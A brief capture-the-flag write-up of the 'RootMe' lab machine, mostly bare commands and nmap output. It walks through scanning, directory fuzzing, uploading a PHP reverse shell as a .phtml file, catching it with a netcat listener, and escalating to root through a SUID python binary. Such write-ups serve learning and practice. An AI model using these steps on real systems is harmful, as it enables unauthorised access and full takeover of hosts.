RootMe - Writeup

1 minute read

RootMe

Reconnaissance

IP: 10.10.164.172

NMAP

nmap -T4 -A -p- 10.10.164.172

Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-01 12:07 UTC
Nmap scan report for ip-10-10-164-172.eu-west-1.compute.internal (10.10.164.172)
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
|   256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_  256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:43:8F:57:0D:17 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/1%OT=22%CT=1%CU=36225%PV=Y%DS=1%DC=D%G=Y%M=02438F%TM
OS:=67C2F8B0%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW
OS:7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4
OS:B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms ip-10-10-164-172.eu-west-1.compute.internal (10.10.164.172)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.75 seconds

Website

Site

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://10.10.164.172/FUZZ

http://10.10.164.172/panel/

Gaining Access

https://www.revshells.com/ pentest monkey php

save as .phtml

nc -lvnp 1337

TTY Shell

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

SUID

find / -perm -u=s -type f 2>/dev/null

https://gtfobins.github.io/gtfobins/python/

./python -c 'import os; os.execl("/bin/bash", "sh", "-p")'

Share on

X Facebook LinkedIn Bluesky

RootMe - Writeup

RootMe

Reconnaissance

NMAP

Website

Site

Gaining Access

Privilege Escalation

Share on

You May Also Enjoy

Tomghost - Writeup

Thompson - Writeup

Skynet - Writeup

LazyAdmin - Writeup